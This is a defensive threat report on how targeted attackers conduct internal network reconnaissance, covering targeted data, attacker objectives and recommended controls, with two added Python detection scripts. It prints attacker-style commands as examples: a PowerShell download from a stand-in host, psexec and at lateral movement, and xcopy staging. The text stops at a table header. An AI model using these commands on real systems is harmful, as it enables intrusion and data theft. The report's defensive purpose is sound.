PIANOS: Protecting Information About Networks The Organisation and It's Systems

Date post: 15-Jan-2015
Upload: phil-huggins
Description:
A report I authored with colleagues on the Network Reconnaissance phase of a targeted attack explaining what is targeted, how the attackers operate and what controls help.

I BAE Systems Applied Intelligence

PIANOS: PROTECTING INFORMATION ABOUT NETWORKS, THE ORGANISATION AND ITS SYSTEMS

CYBER PREPARE


EXECUTIVE SUMMARY

The technical information describing your IT environment and the business information describing your organisation are very valuable to an attacker and are often collected during targeted attacks.

At Davos in January 2013 Ian Livingston, the then Chief Executive of BT, said: “There are two types of CEO – those that know their systems are being hacked and those that don’t”. He went on to say: “For pretty much any company I’ve come across, it should be one of the top three risks.”

These echoed comments from Robert S Mueller, III, Director of the FBI in February 2012 at the RSA Security Conference who said – “There are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again”.

A critical change to the Cyber Security landscape in recent years is the growth of targeted attacks, undertaken by well resourced attackers with access to sophisticated tools. Targeted attacks are persistent and can be stealthy, using techniques which are designed to evade traditional defences. The attacker can then work quietly out of view to achieve their objectives, which often include finding and harvesting target information. Targeted attacks follow a multi-stage process which is often described using ‘kill chains’, a term that includes a chain of activities from the earliest probing of defences through to the stealing of data. In order to defend against targeted attacks organisations must deploy defences that address every stage of the kill chain.

The focus of this report is to provide an insight into the network reconnaissance activity undertaken by attackers following a successful infiltration of a target network. Critically our research finds that:

• Attackers predominantly use legitimate system tools to perform internal network reconnaissance, allowing them to hide and operate within normal network activity. It is difficult for an organisation to restrict the use of these network tools without hampering their legitimate and essential use by systems administrators.

• Attackers also exploit the use of common applications, many of which fulfil legitimate business requirements complicating an organisation’s ability to apply restrictions to the use of the programs.

• Attackers subvert existing programs running on victim computers both to hide their activities and to ensure they can return time and time again.

Based on our findings, this report contains guidance on particular controls, tactics and techniques that organisations can employ to slow and detect network reconnaissance activities.

This report also discusses the material, common to all IT infrastructures, that is often sought by attackers during network reconnaissance activities. Effective protection of this material can reduce the attacker’s ability to understand the victim environment, thereby impeding the progress of an attack.

“There are two types of CEO, those that know their systems are being hacked – and those that don’t. For pretty much any company I’ve come across, it should be one of the top three risks.”
Ian Livingston, former CEO, BT plc: World Economic Forum, Davos, January 2013.


BAE Systems would like to acknowledge the help and support of CPNI in producing this document and the accompanying products.


CONTENTS

EXECUTIVE SUMMARY II

1 INTRODUCTION 2

1.1 Background 2

1.2 Summary of Findings 4

2 INTRODUCTION TO NETWORK RECONNAISSANCE 6

2.1 The Kill Chain 7

2.2 Information Targeted by Network Reconnaissance 8

2.3 Emerging Targets 11

3 NETWORK RECONNAISSANCE OBJECTIVES 12

3.1 Identify key environment information 12

3.2 Download of additional tools to collect environment information 13

3.3 Elevate privileges to collect environment information 13

3.4 Lateral movement 14

3.5 Stage environment information for exfiltration 14

3.6 Network Reconnaissance Objectives dependencies 15

4 NETWORK RECONNAISSANCE CASE STUDIES 17

4.1 Case study 1: Attack group – CommentCrew 17

4.2 Case study 2: Reconnaissance on a compromised web server 22

4.3 Case study 3: Tools used during intrusions 27

5 CONTROLS, TACTICS AND TECHNIQUES 29

5.1 Categories of defensive capability 29

5.2 Attack & defence controls matrix 30

5.3 Controls, tactics & techniques – definitions 31

6 RECOMMENDATIONS 37

6.1 Critical countermeasures 37

6.2 Ideal countermeasures 42

7 CONCLUSION 49

7.1 Key Takeaway 49

8 BIBLIOGRAPHY 50


1 INTRODUCTION

1.1 BACKGROUND

Targeted attacks are becoming more prevalent. Conducted by well-resourced attackers with access to sophisticated tools and techniques, the aim of these attacks is often to steal information. Targeting means that the attackers select their targets carefully and deliberately to provide access to assets of value or to an influential network (or IT system); targeting also means that the attackers research the target in advance to explore the ‘attack surface’ looking for exploitable weaknesses.

All organisations should consider themselves under attack and take steps to increase the effectiveness of their defences, particularly those which mitigate the risks posed by targeted attacks.

Network defenders can often observe targeted attacks carrying out repeated attempts to complete the job they have been created to do and working to penetrate the desired target until they meet their objective. They are also different in what they target, typically seeking specific information about (or held by) an organisation.

Espionage groups readily make use of cyber-attacks in order to collect information of strategic, economic and political importance. Since the information they are seeking is often only available within select organisations, this means that these attackers target the same organisations repeatedly, with little concern regarding the cost of the operation. These attackers are able to dedicate more time to subverting the security controls in place to achieve their goals. Often the actions of actors in this space are driven by real world events, where a requirement has been issued to identify specific information held by a particular organisation. For example in the case of the attackers known as ‘DnsCalc’ whose attack on the New York Times was disclosed in January 2013, the attackers appeared to be motivated by articles the New York Times had written on the Chinese prime minister [1].

“There is a vast swathe of corporates who have valuable intellectual property, much more valuable than they understand, which is inadequately protected. They don’t even realise it has been stolen. They don’t even know they have been the subject of attack. They usually have to be told about it by a third party, most of them do not discover it for themselves. The level of awareness is nothing like it needs to be. This is a very, very serious state of affairs.”
The Rt Hon Baroness Neville-Jones, UK Government Special Representative to Business on Cyber Security, speech to the Global Strategy Forum, February 2012.



Critically however, in order to achieve their goals attackers must understand the environment they are attacking, which means that regardless of the organisation targeted much of the information sought is the same. Attackers target information about the systems and networks they are attacking, and by defending this information organisations can hinder the actions of attackers.

The challenges facing businesses that arise from this threat can be summarised as follows:

• Threat: modern threat agents are more numerous, more motivated and more organised than we have seen previously. They can also operate at scale and with financial backing in a way not seen before.

• Fragility: The complexity of modern IT systems continues to increase year on year, as does our dependence on these systems. A single exploitable ‘point weakness’ anywhere in an enterprise can cause problems everywhere.

• Embrace and Reach: Modern IT systems embrace and manage an entire enterprise. They reach out to include suppliers, business partners and customers. Such holistic connectivity means that a problem can rapidly ‘de-localise’, causing problems for the entire market segment.

• Situational Awareness: The security picture, both inside and outside an organisation can change rapidly, sometimes within hours. Static, fixed security defences cannot respond to this real-world volatility.

• Resources: Security solutions designed for the current evolved threat scenario require careful and knowledgeable design. The qualified security practitioners who can design and maintain these are a scarce resource.

Cyber-attacks focus on the development and exploitation of advantage – either acquiring something valuable that can be exploited directly (e.g. sensitive or valuable information, credentials, etc.), or establishing a hold over a target that can be exploited later (e.g. to sustain on-going surveillance, to implant malicious software to shut down a network on command, etc.). Such attacks are designed to be stealthy, and to persist over time.

A good overview of the scale, targeting and persistence of such cyber-attacks can be found in a recent Mandiant report [2].


1.2 SUMMARY OF FINDINGS

The focus of this analysis is to provide an insight into the network reconnaissance activity undertaken by attackers following a successful infiltration of a target network (i.e. the Lateral Access stage of the BAE Systems Kill Chain, which we describe in Figure 2).

Our research finds that targeted attacks typically make use of legitimate system tools to prosecute their aims, and by doing so they disguise their internal network reconnaissance by hiding and operating within normal network activity. Attackers also exploit the use of computer programs, and in doing so they make use of computer programs and processes which fulfil legitimate business requirements, complicating an organisation’s ability to apply restrictions.

Based on these findings, this report contains guidance on particular controls, tactics and techniques that organisations can employ to impede successful network reconnaissance from taking place. A core set of critical controls that all organisations should implement is listed below:

• Network Monitoring – In order for the other controls to be effective (particularly incident response) it is critical that high quality logs are kept and that security alerts are generated from an extensive deployment of sensors across the estate.

Such logs should be stored for extended periods. Both successful and unsuccessful connections should be logged, and we also recommend the use of host-based logging which enables the detection of new tools downloaded by the attacker and is a force multiplier for the network defender.

• Log Analysis – it is exceedingly difficult for an attacker to conduct network reconnaissance without their activity being recorded in log files on a well-configured system, so by analysing system and network logs continuously organisations give themselves the best chance of detecting on-going attacks.

• Incident Response – a human is behind all attacks. Whilst no network defence is infallible, our research finds that attacker activity cannot go unrecorded. When suspicious activity is identified, having a timely incident response capability which works at a faster pace than the attacker is key, enabling organisations to determine the root cause of the suspicious activity and stop it, minimising the damage an attacker can do.

• Threat Intelligence – as a target you are not alone. The extent of online attacks is now of such a scale that campaigns of attacks occur across sectors and countries. It is likely that the threat actors attacking you have attacked someone else and that their behaviours and characteristics have been recorded and shared. Threat Intelligence is a technique that includes the collection, analysis and sharing of attacker technical and behavioural data from both within and outside of your organisation to determine the threat to your environment. This can provide the opportunity to predict attacks and in some cases spot attacks much earlier.

We also recommend that organisations should employ the following ‘Ideal’ controls in order to ensure the defences are adequate; however we recognise that the cost or associated business impact of these controls may mean some organisations are unable to employ these controls:

• Behavioural Analysis – essentially an extension of log analysis, organisations should implement behavioural analysis on log data collected on typical user activity. When undertaken over large data sets, behavioural analytics and big data techniques can detect subtle cyber threats such as a concentration of system administrator tools on a regular user account, downloads of additional malware tools, or communication channels with previously unknown command and control (C2) servers.

• Software Inventory – having a comprehensive inventory of known software and restricting users to running known software is the most effective of the ‘DENY’ controls mentioned in the report. Most actions conducted by attackers following infiltration have a pre-requisite that they have downloaded and executed an additional tool; preventing this can inhibit both the infection and the operation of malware.

• Network Diode – segregating valuable data from operational networks is an effective way to reduce the risk of high value data being lost. Organisations should use Network diode technology to make lateral movement difficult, as well as preventing access to critical data and systems. Implementation of Network diodes should be considered as part of a wider consideration of where the critical data is on enterprise networks, whether there is a business requirement for it to be in that location and which users require access to the data.


• Account Monitoring – by monitoring user accounts organisations enable themselves to detect both insiders and attackers attempting to impersonate legitimate users. This measure mitigates risks which could develop as a result of other weak areas such as dormant or inactive accounts which an attacker could exploit, and detects where an attacker has been able to escalate privileges.

• Privileged User Management – attackers will seek to escalate their privileges in order to gather sensitive technical data about the target environment. Increasing the basic security controls for legitimate privileged users, such as required password complexity and tighter, more frequent auditing of legitimate privileged accounts, together with the use of dedicated administrative accounts and break-glass procedures for access, reduces the risk of the compromise of privileged accounts going unnoticed.


2 INTRODUCTION TO NETWORK RECONNAISSANCE

This report focusses on the last stages of the Kill Chain, specifically on the protection of the internal network information which the espionage actors behind targeted attacks need access to prior to acting on their objectives. As such, we presuppose that the attacker has successfully executed the earlier stages of the attack (as defined in the explanation of the Kill Chain at Section 2.1). This report does not address measures to protect against the initial reconnaissance activity which takes place before a Targeted Attack commences.

The following sections provide real case studies detailing the actions of attackers in carrying out this latter stage activity, explaining what information is typically targeted along with the motivations for the attackers’ actions and how the results of these actions are used to achieve their objectives. Additionally, we provide recommendations which will guide organisations to improve their defences and hinder attackers.

In particular, this report looks at:

• Examples of system resources targeted by attackers during internal network reconnaissance.

• Tricks used by attackers to achieve persistence, move laterally and identify data of interest.

• Examples of tools used by attackers during internal network reconnaissance, why they use them and how they are used.

• Controls, tactics and techniques that organisations could employ to mitigate internal network reconnaissance techniques.


2.1 THE KILL CHAIN

The Lockheed Martin Kill Chain [3] describes a model for cyber-attacks. The model consists of seven stages, as shown in Figure 1. Each stage can be studied in its own right, and organisations should seek to, as a minimum, address each stage of the Kill Chain.

[Figure 1: The Lockheed Martin Kill Chain. Stages: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Actions on Objectives.]

[Figure 2: The BAE Systems Kill Chain and the focus of this report. The Lockheed Martin stages are shown alongside the BAE Systems stages: Reconnaissance, Infiltrate, Exploit, Remote Access, Persistence, Escalate, Lateral Access, Gather, Exfiltrate, Clean Up. The scope of this report is highlighted within the Lateral Access stage and labelled ‘Enumeration of information systems & resources’ and ‘Compromise of additional systems & identities’.]

BAE Systems has found the concept of the Kill Chain useful but has expanded the Kill Chain to better describe the types of targeted attacks we have seen and to better understand the various defensive controls, tactics and techniques that are effective during targeted attacks.

This report focuses on the enumeration activities of the attacker during the ‘Lateral Access’ stage of the BAE Systems Kill Chain, as highlighted in Figure 2, which is a subset of the Actions on Objectives stage of the Lockheed Martin Kill Chain.


At this stage attackers have established a command and control channel and are able to issue commands to victim machines – at this point attackers seek and exfiltrate data about the target organisation in order to improve their understanding of the target environment. Subsequently this information will enable them to compromise additional systems and identities and ultimately pinpoint the high value data they wish to retrieve.

2.2 INFORMATION TARGETED BY NETWORK RECONNAISSANCE

From our experience handling targeted attacks a list of information commonly targeted during network reconnaissance has become evident. This includes a range of information about the target environment from lists of potential targets for lateral movement, to system information or user information to aid escalation or even the presence of security tooling that might put the attack at risk.

Sections 3 and 4 of this report discuss example techniques and case studies for how this information can be harvested. Primarily this is either through some form of enumeration using management tools and management network protocols directly or indirectly through the compromise of information repositories such as Configuration Management Databases or Software Inventories. Such technical information assets can often be overlooked by an information assurance function focused on protecting business information assets.

It is not possible to say which information is of most value to an attacker without the context of your organisation’s business and the attackers’ goals in targeting you.

2.2.1 TARGETED ENVIRONMENT INFORMATION

Table 1: Targeted Environment Information

Targeted Information | Attackers’ Goals
Lists of Windows or UNIX network file shares. | Discovery of other technical or business information about the organisation as well as potentially discovering the targeted business assets.
Full directory listings for network file shares. | Discovery of other technical or business information about the organisation as well as potentially discovering the targeted business assets.
Identification of the Domain Controller server/s. | Discovery of users, systems, services and potentially passwords.
Identification of any database servers. | Discovery of targeted business assets.
Identification of management subnets or servers. | Discovery of additional systems to target and other routes to exfiltrate information.
Identification of servers keeping network logs. | Discovery of technical information describing the systems in your estate as well as the potential editing or deletion of records that may expose the attackers’ actions.
Lists of devices (and their types) on the estate. | Discovery of additional systems to target.
External IP addresses for devices on the network (if applicable). | Discovery of additional systems to target and other routes to exfiltrate information.
Internal IP address ranges for devices on the network. | Discovery of additional systems to target.
Proxy settings used to connect to the internet. | Discovery of routes to exfiltrate information.
Credentials for VPN services, e-mail services & any other services that can be accessed remotely. | Discovery of routes to exfiltrate information.
URLs for intranet pages, and technology used within those pages. | Discovery of other technical or business information about the organisation as well as potentially discovering the targeted business assets.
Lists of open ports for outbound connectivity. | Discovery of routes to exfiltrate information.

2.2.2 TARGETED USER INFORMATION

Table 2: Targeted User Information

Targeted Information | Attackers’ Goals
List of usernames, associated security groups or permissions. | Discovery of additional identities to target in order to move laterally onto additional systems or to escalate privileges.
Password hashes associated with those users. | Compromise of additional identities to target in order to move laterally onto additional systems or to escalate privileges.
Users currently logged in on machines (both locally and network-wide). | Discovery of additional identities to target in order to move laterally onto additional systems or to escalate privileges.


2.2.3 TARGETED SYSTEM INFORMATION

Table 3: Targeted System Information

Targeted Information | Attackers’ Goals
Lists of services and applications running both on the current machine and the wider network. | Discovery of potential vectors of attack to move laterally onto additional systems or to escalate privileges on the local machine.
Versions of services and applications running on the current machine and the wider network. | Discovery of potential vulnerabilities to move laterally onto additional systems or to escalate privileges on the local machine.
Anti-virus vendors in use across the estate. | Evasion of tools that may expose the attackers’ actions.
Other security products in use across the estate. | Evasion of tools that may expose the attackers’ actions.

2.2.4 TARGETED OTHER INFORMATION

Table 4: Targeted Other Information

Targeted Information | Attackers’ Goals
Administrative account lists and shared passwords. | Discovery of additional high-value identities to target in order to move laterally onto additional systems or to escalate privileges.
Backup files containing much of the information described above. | Discovery of other technical or business information about the organisation as well as potentially discovering the targeted business assets.
Intranet pages or presentations containing organisation charts identifying high-value individuals to target. | Discovery of additional high-value identities to target in order to move laterally onto additional systems or to escalate privileges.


2.3 EMERGING TARGETS

The targeted information described in Section 2.2 represents the common network reconnaissance targets we have observed. To date these have been successful and low risk for most attackers.

Increasingly organisations are investing in highly useful and valuable technical data repositories such as those listed in the table below.

Table 5: Emerging Targets

Targeted Information | Attackers’ Goals
Configuration Management Databases (CMDB). | Discovery of technical information regarding the location, purpose and configuration of key systems.
Network Directories (LDAP, Active Directory). | Discovery of users, groups with attractive permissions and discovery of systems. Some ability to map the organisational structure of the targeted organisation.
Software Inventories. | Discovery of systems and detailed information regarding the software deployed including version information.
Patch Management Tools. | Discovery of systems and detailed information regarding the software deployed including version information and the existence of unpatched systems across the estate.
Service Management Desks. | Discovery of key systems as well as visibility of incident response processes and activities.
Network Operations Centres (NOCs) dashboards. | Discovery of key systems including extensive and current network maps.
Log Repositories. | Discovery of key systems, of software deployed and versions, identification of systems with well-configured or poorly-configured logging.
Backup Archives. | Discovery of key systems, recovery of targeted data as well as recovery of user account details and credentials.

As these sorts of repositories become more common, and importantly, more accurate and complete, they will increasingly become attractive targets for attackers. Compromising these repositories will enable the attacker to rely on a less ‘noisy’ technique for network reconnaissance. This is less likely to trip security sensors across the environment than the indiscriminate scanning that is currently often conducted with impunity during network reconnaissance.

Consequently, it is important to consider both the protection of these repositories from unauthorised access and also the security monitoring of these repositories as cyber ‘canaries’ for targeted attacks.
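To show what ‘canary’ monitoring of such repositories might look like in practice, here is an added Python example, not part of the BAE Systems report, that applies three simple rules to repository access records: an account outside the expected user set for that repository, a single bulk read above a threshold, and out-of-hours access by a non-service account. The record format, repository names, account names, allow-list and thresholds are all constructed for the example and would in practice come from the organisation’s own role assignments and baselines.

```python
from datetime import datetime, time

# Repositories of the kind listed in Table 5 and the accounts expected to use each one.
# Hypothetical allow-list: in practice this is derived from role assignments.
EXPECTED_USERS = {
    "cmdb": {"svc_cmdb", "itops1"},
    "patch_mgmt": {"itops1", "itops2"},
    "log_repo": {"soc1", "soc2"},
    "backup_archive": {"svc_backup"},
}
# Service accounts run scheduled jobs at night, so they are exempt from the hours rule.
SERVICE_ACCOUNTS = {"svc_cmdb", "svc_backup"}
BULK_THRESHOLD = 500                         # records returned by one request
BUSINESS_HOURS = (time(7, 0), time(19, 0))   # local time, inclusive

# Constructed access records (not real data): timestamp|repository|account|action|records_returned
SAMPLE_ACCESS = """\
2013-04-02T10:15:00|cmdb|itops1|query|12
2013-04-02T10:20:00|cmdb|jsmith|query|40
2013-04-02T22:41:00|cmdb|itops1|export|3200
2013-04-02T11:00:00|patch_mgmt|itops2|query|8
2013-04-02T11:05:00|log_repo|soc1|query|200
2013-04-02T03:12:00|backup_archive|svc_backup|restore|1
"""


def parse_access(text):
    """Parse the pipe-separated records into dicts with typed fields."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, repo, account, action, count = line.split("|")
        records.append({
            "time": datetime.fromisoformat(ts),
            "repository": repo,
            "account": account,
            "action": action,
            "records": int(count),
        })
    return records


def canary_alerts(records):
    """Return (timestamp, repository, account, reasons) for every access that
    trips at least one canary rule; reasons are listed in rule order."""
    alerts = []
    for r in records:
        reasons = []
        if r["account"] not in EXPECTED_USERS.get(r["repository"], set()):
            reasons.append("unexpected-account")
        if r["records"] >= BULK_THRESHOLD:
            reasons.append("bulk-read")
        in_hours = BUSINESS_HOURS[0] <= r["time"].time() <= BUSINESS_HOURS[1]
        if not in_hours and r["account"] not in SERVICE_ACCOUNTS:
            reasons.append("off-hours")
        if reasons:
            alerts.append((r["time"].isoformat(), r["repository"], r["account"], tuple(reasons)))
    return alerts


if __name__ == "__main__":
    for alert in canary_alerts(parse_access(SAMPLE_ACCESS)):
        print(alert)
```

On the constructed records the script raises two alerts: the CMDB query by an account that is not an expected CMDB user, and the late-evening export of 3,200 CMDB records by an otherwise legitimate operator. The second case is the one the text is pointing at: a bulk read of a repository by a valid account is exactly the ‘less noisy’ reconnaissance a canary rule should surface.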


3 NETWORK RECONNAISSANCE OBJECTIVES

Network reconnaissance refers to the activities of an attacker during the enumeration phase of the lateral movement stage of the BAE Systems Kill Chain. Malware used by cyber espionage operators often has limited automated functionality when compared with malware, such as ZeuS, designed to steal banking credentials. Instead, malware used in espionage is often designed so that the attacker is effectively operating a remote shell on the victim’s machine, removing the requirement for many capabilities present in commercial malware. Attackers use the remote shell to obtain sensitive data/information. This requires network reconnaissance, as they are after specific information which is difficult to identify automatically, and such information may not be on the first infected machine. In addition to this, espionage malware is typically:

• Difficult to detect using signatures, because it is often recently written, meaning there has been no chance for Anti-Virus (AV) solutions to have discovered the relevant signatures.

• Lightweight, making it difficult to detect using basic heuristics.

This section of the report provides an overview of the attackers’ objectives. We have categorised the possible objectives an attacker might have once they have gained remote shell access to a victim machine.

The network reconnaissance performed by an attacker is aligned to the objectives the attacker is required to achieve. Sections 3.1 to 3.5 give an overview of the objectives, the motivations and the tools used to achieve them. Section 4 provides case studies, going into detail on methods observed being used by real attackers, providing logs from the attacks where possible.

3.1 IDENTIFY KEY ENVIRONMENT INFORMATION

There are many reasons attackers are interested in building up a network diagram of the target organisation, these include:

• To identify applications that can be subverted later on in the same attack or in future attacks.

• To identify anti-virus providers in use, such that malware used in future attacks can be checked against the anti-virus product before being launched.

• To check versions of applications running across the network that may be vulnerable, such that in future attacks they can be exploited.

• To identify users that exist in the organisation, and where they sit on the network – such that in the future more tailored spearphishing attacks can be launched.

• To identify the structure of the network so that, next time an attack is attempted, less time is spent identifying what each network share is for.

• To identify privileged users (such as Administrators, and Asset Management users), such that their accounts can be targeted in future attacks.


3.1.1 EXAMPLE TOOLS/METHODS

One of the best tools for this is the freeware GUI-based tool ‘ShareENUM’. ShareENUM provides the capability to enumerate all print and file shares on the domain including their security settings. Further features of the tool include:

• Use of inbuilt Windows functionality to identify network shares – such as the ‘net view’ command.

• Use of the SysInternals tool ‘psloggedon’ – this tool allows attackers to identify users logged onto a particular share. When used the tool looks like this:

psloggedon.exe \\HOSTNAME

This command can be used to identify the relationship between a device and a user, which can be used to target machines owned by important individuals e.g. company director, system admin. It can also be used to ensure that the attacker does not log onto a machine at the same time as a user who is already logged on – to avoid detection.

• Identify applications running – this can be done using the Windows command Tasklist or the SysInternals tool ‘pslist’, both of which list processes running – each process being tied to an application. By building up a list of applications running attackers can seek to identify processes they can subvert, as well as key information for future attacks such as which anti-virus provider is in use at that particular organisation.

3.2 DOWNLOAD OF ADDITIONAL TOOLS TO COLLECT ENVIRONMENT INFORMATION

It is easier for the attacker to conduct network reconnaissance activity with the aid of additional tools. Attackers are often observed downloading legitimate tools, such as components of the SysInternals suite, to conduct network reconnaissance, as well as malware tools such as password-dumping software.

3.2.1 EXAMPLE TOOLS/METHODS

The attacker tool set is usually downloaded using the initial file created by the exploit, and therefore in most cases no additional tools are required for this.

This objective can also be completed using inbuilt Windows functionality, such as Windows PowerShell, for example:

(New-Object System.Net.WebClient).DownloadFile('http://blah.com/file.txt', 'C:\tmp\file.txt')

3.3 ELEVATE PRIVILEGES TO COLLECT ENVIRONMENT INFORMATION

Depending on the security controls on the victim network and the access levels of the user who unknowingly executed the malware, this objective may not be necessary. This is because if the initial malware is executed with administrator privileges then the attacker will not be required to elevate their privileges any further. Furthermore, if poor security controls are in place it might be the case that it is not necessary to have administrator privileges, as most functionality may be available to all users regardless of their role.

There are two types of elevating privileges the attacker is interested in:

1. Elevating privileges on the infected local machine to gain the ability to execute existing or additional tools to enumerate information locally

2. Elevating or changing privileges on the network to gain access to network shares which the current account cannot reach, to gain access to key servers within the estate (e.g. the Domain Controller, log servers or database servers) and to pivot internally to other machines in the estate. In order to elevate or change privileges on the network it is likely that the attacker already has elevated privileges on the infected local machine.


3.3.1 EXAMPLE TOOLS/METHODS

• Identifying administrator users and dumping the password hashes of those users. An example of the sequence of commands that might be used to do this can be seen in Section 4.1.7.

• Further exploiting currently running applications and processes using the increased privileges, for example those shown in Section 4.1.4.

• Binary planting – this is the practice of replacing executables used by legitimate services or applications with malicious files.

3.4 LATERAL MOVEMENT

There are two key motivations for attackers to attempt lateral movement once they have infected a victim machine.

The first is to ensure that the attack is not short-lived: attackers use the remote access they have gained to infect other machines. Often, different malware variants are used, such that if one variant is discovered the others remain undetected.

The second is in pursuit of the files that they are targeting. It may be necessary to move to alternative parts of the network to access specific files.

3.4.1 EXAMPLE TOOLS/METHODS

• Windows Task Scheduler (at.exe), for example:

at \\10.1.1.1 10:00 a.bat

• Extensive use of the SysInternals suite, particularly psexec, for example:

psexec \\MACHINE-A ipconfig /all

This command can be used both to move laterally on the network, as well as to perform reconnaissance on machines which are not yet infected.

3.5 STAGE ENVIRONMENT INFORMATION FOR EXFILTRATION

This objective is not always a distinct step in an attack: having gathered useful environment information, the attackers will want to retrieve it in order to review and analyse its contents. Sometimes the attackers will exfiltrate files as and when they find them; however, on several occasions we have observed attackers collecting the files they wish to exfiltrate in a central location.

Often, in doing so, they hide the files for exfiltration in a benign location on the disk, or in a new directory created by the attacker, using xcopy or SysInternals tools. This is so that they can:

• Exfiltrate files in one transaction to avoid the risk of being removed from the network before the mission is complete.

• Encrypt or zip the files to ensure any solution checking content leaving the network is unable to scan them for keywords (Data Loss Prevention alerts). Smaller files are also less likely to raise alerts in intrusion detection systems or network monitoring solutions.

3.5.1 EXAMPLE TOOLS/METHODS

• Use of WinRAR or custom variants thereof.


• Use of xcopy, for example:

xcopy "C:\Documents and Settings\Docs" "C:\Windows\System32\Help"

Xcopy is sometimes used instead of the ‘copy’ command because xcopy has a large array of options which attackers find useful, such as preserving the creation timestamp of a file which has been copied.

• The attackers often make use of existing compression tools installed on the OS; these have included Makecab.exe, the default utility for making Microsoft cabinet files, as well as 7-Zip.
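As an added example (not code from the report), the following Python script scans constructed Windows process-creation events for the lateral-movement and staging patterns listed in Sections 3.4 and 3.5: at/psexec against a remote host, copies into a system directory such as System32\Help, use of makecab/WinRAR/7-Zip, and a scripted ftp run, raising a finding when a staging step is followed by scripted FTP within a short window. The tab-separated log format, the hostnames and user names, and the 30-minute window are assumptions.

```python
"""Detect the staging and lateral-movement patterns described in Sections 3.4
and 3.5 in Windows process-creation events.

Added example; not code from the PIANOS report.  The log format (one event per
line: timestamp, host, user, command line, tab-separated) and every sample line
are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events.  WS-117 shows the xcopy -> makecab -> ftp -s chain
# from Section 3.5 after at/psexec use; WS-204 is a benign backup job.
SAMPLE_EVENTS = """\
2013-08-20 09:01:10\tWS-117\tCORP\\jsmith\tat \\\\10.1.1.1 10:00 a.bat
2013-08-20 09:03:45\tWS-117\tCORP\\jsmith\tpsexec \\\\MACHINE-A ipconfig /all
2013-08-20 09:12:02\tWS-117\tCORP\\jsmith\txcopy "C:\\Documents and Settings\\Docs" C:\\Windows\\System32\\Help\\ /E /K
2013-08-20 09:14:30\tWS-117\tCORP\\jsmith\tmakecab /F C:\\Windows\\System32\\Help\\list.ddf
2013-08-20 09:20:05\tWS-117\tCORP\\jsmith\tftp -s:up.txt
2013-08-20 10:30:00\tWS-204\tCORP\\backupsvc\txcopy D:\\Data E:\\Backup /E /K
2013-08-20 11:02:11\tWS-204\tCORP\\backupsvc\tftp -s:nightly.txt
"""

STAGE_WINDOW = timedelta(minutes=30)  # assumed: staging-to-ftp window
# Directories the report names as benign hiding places for staged files.
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\help\\")
COMPRESSORS = {"makecab", "makecab.exe", "rar", "rar.exe", "winrar", "winrar.exe",
               "7z", "7z.exe", "7za.exe"}


def _tokens(cmdline):
    """Split a command line, keeping quoted arguments together (quotes stripped)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(cmdline):
    """Return the set of Section 3.4/3.5 indicators present in one command line."""
    tags = set()
    toks = _tokens(cmdline)
    if not toks:
        return tags
    exe = toks[0].lower().rsplit("\\", 1)[-1]          # basename of the program
    args = [t for t in toks[1:] if not t.startswith("/")]  # drop cmd switches
    # 3.4.1: scheduled task or psexec aimed at a remote host (\\HOST)
    if exe in ("at", "at.exe", "psexec", "psexec.exe") and args and args[0].startswith("\\\\"):
        tags.add("lateral")
    # 3.5.1: copy whose destination is a Windows system directory
    if exe in ("xcopy", "xcopy.exe", "copy") and len(args) >= 2:
        if any(d in args[-1].lower() for d in SYSTEM_DIRS):
            tags.add("stage_copy")
    if exe in COMPRESSORS:
        tags.add("compress")
    # 3.5 / 4.1.7: ftp driven by a script file (-s:file)
    if exe in ("ftp", "ftp.exe") and any(a.lower().startswith("-s:") for a in toks[1:]):
        tags.add("exfil_script")
    return tags


def parse_events(text):
    """Parse the constructed tab-separated events into dicts sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmdline = line.split("\t", 3)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "host": host, "user": user, "cmdline": cmdline,
                       "tags": classify(cmdline)})
    return sorted(events, key=lambda e: e["ts"])


def find_staging_chains(events, window=STAGE_WINDOW):
    """Per host, report a staging step (copy into a system dir or compression)
    followed within `window` by a scripted ftp run: the Section 3.5 pattern."""
    findings = []
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    for host, evs in by_host.items():
        staged = [e for e in evs if e["tags"] & {"stage_copy", "compress"}]
        for ftp in (e for e in evs if "exfil_script" in e["tags"]):
            prior = [s for s in staged if ftp["ts"] - window <= s["ts"] <= ftp["ts"]]
            if prior:
                findings.append({
                    "host": host, "user": ftp["user"],
                    "start": prior[0]["ts"], "end": ftp["ts"],
                    "lateral": any("lateral" in e["tags"] for e in evs),
                    "commands": [s["cmdline"] for s in prior] + [ftp["cmdline"]],
                })
    return findings


if __name__ == "__main__":
    for f in find_staging_chains(parse_events(SAMPLE_EVENTS)):
        print(f"[{f['host']}] {f['user']}: staging then scripted ftp, "
              f"{f['start']:%H:%M:%S}-{f['end']:%H:%M:%S}; lateral movement seen: {f['lateral']}")
        for c in f["commands"]:
            print("    ", c)
```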

3.6 NETWORK RECONNAISSANCE OBJECTIVES DEPENDENCIES

It should be noted that the Network Reconnaissance Objectives are inter-dependent; the relationships between them are highlighted below. While we are concerned with the harvesting and gathering of environment information, this often requires other objectives to be completed first.

3.6.1 IDENTIFY KEY ENVIRONMENT INFORMATION

Partially dependent on:

• Download of additional tools to collect environment information

• Elevating privileges to collect environment information

3.6.2 DOWNLOAD OF ADDITIONAL TOOLS TO COLLECT ENVIRONMENT INFORMATION

Partially dependent on:

• Elevating privileges to collect environment information

3.6.3 ELEVATING PRIVILEGES TO COLLECT ENVIRONMENT INFORMATION

Partially dependent on:

• Download of additional tools to collect environment information

3.6.4 LATERAL MOVEMENT

Partially dependent on:

• Download of additional tools to collect environment information

• Elevating privileges to collect environment information

• Identify key environment information

3.6.5 STAGE ENVIRONMENT INFORMATION FOR EXFILTRATION

Dependent on:

• Download of additional tools to collect environment information

• Identify key environment information

Partially dependent on:

• Elevating privileges to collect environment information

• Lateral movement


Table 6: Network Reconnaissance Objective Inter-Dependence (each row shows what that objective depends on)

| Network Reconnaissance Objectives | Identify key environment information | Download of additional tools to collect environment information | Elevate privileges to collect environment information | Lateral movement | Stage environment information for exfiltration |
